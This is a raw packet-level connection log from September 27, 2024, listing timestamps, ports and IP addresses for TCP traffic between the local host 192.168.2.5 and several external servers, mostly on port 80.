Sep 27, 2024 04:21:17.695988894 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696012974 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696033955 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696050882 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696060896 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696073055 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696082115 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696088076 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696091890 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696109056 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696141005 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696146011 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696151018 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696161985 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696173906 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696191072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696198940 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696203947 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696230888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696265936 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696270943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696281910 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696314096 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696331024 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696341038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696352005 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696361065 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696367979 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696409941 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696417093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696495056 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696505070 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696536064 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696547031 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696557999 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696568012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696578979 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696583033 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696609974 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696616888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696647882 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696676970 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696712017 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696805000 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696815014 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696825981 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696890116 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696897984 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696933031 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696949959 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696963072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696973085 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696984053 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.696986914 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.696995020 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697005987 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697009087 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697016954 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697027922 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697038889 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697052956 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697058916 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697077036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697079897 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697088003 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697108984 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697144032 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697226048 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697236061 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697247982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697259903 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697269917 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697282076 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697288036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697298050 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697309017 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697312117 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697312117 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697319984 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697345018 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697390079 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697392941 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697402954 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697415113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697426081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697427988 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697448969 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697464943 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697494984 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697561026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697571993 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697582960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697593927 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697598934 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697603941 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.697617054 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.697649002 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.700676918 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:17.704236984 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.704247952 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.704252958 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.704281092 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.704292059 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.704301119 CEST	45580	49719	65.21.18.51	192.168.2.5
Sep 27, 2024 04:21:17.704330921 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:17.704380035 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:17.725852013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.725887060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.725898981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.725909948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.725922108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.725930929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.725934982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.725950956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.726005077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.726016045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.726016045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.726079941 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.728223085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728235960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728247881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728296041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728307962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728318930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728332043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728342056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.728342056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.728343010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.728389025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.728389025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.732709885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.732820034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.732929945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.732953072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.732970953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.732983112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.732989073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.732991934 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.732995033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733000994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.733016968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733027935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733032942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733046055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.733047962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733059883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733071089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733081102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733093023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733103037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.733130932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.733130932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.733201027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734124899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734136105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734147072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734205961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734231949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734246969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734260082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734271049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734271049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734285116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734294891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734395027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734751940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734798908 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734807014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734824896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734838009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734855890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734864950 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734869003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734882116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.734908104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.734908104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735115051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735296965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735347986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735362053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735373974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735416889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735416889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735430956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735443115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735455036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735466003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735488892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735488892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735575914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735609055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735625982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735640049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735651016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735661983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735668898 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735678911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735691071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.735749960 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735749960 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.735984087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736056089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736066103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736083984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736093998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736097097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736107111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736162901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736162901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736181974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736202002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736215115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736227036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736242056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736260891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736273050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736277103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736277103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736314058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736319065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736320019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736388922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.736721992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.736974955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.741118908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741131067 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741143942 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741213083 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741224051 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741235018 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741256952 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741267920 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741271019 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741278887 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741297960 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741298914 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741311073 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741322041 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741326094 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741333961 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741352081 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741353035 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741364956 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741377115 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741379023 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741394043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741396904 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741405010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741456985 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741475105 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741487980 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741488934 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741498947 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741516113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741525888 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741527081 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741537094 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741549015 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741563082 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741576910 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741588116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741589069 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741600990 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741607904 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741611958 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741622925 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741640091 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741682053 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741708040 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741741896 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741744995 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741754055 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741776943 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741786957 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741796017 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741799116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741817951 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741830111 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741839886 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741842031 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741864920 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741884947 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741920948 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741931915 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741950035 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741960049 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741971970 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.741977930 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.741986036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.742003918 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.742011070 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.742013931 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.742027044 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.742060900 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.755014896 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:17.761570930 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761583090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761596918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761630058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.761635065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761646986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761661053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761672020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761682987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.761709929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.761710882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.761857033 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764189005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764202118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764214993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764256001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764266968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764275074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764280081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764292002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764307976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764334917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764377117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764436007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764448881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764460087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764471054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764482021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764498949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764507055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764507055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764530897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764604092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764616013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764628887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764638901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.764648914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.764650106 CEST	80	49725	185.215.113.117	192.168.2.5
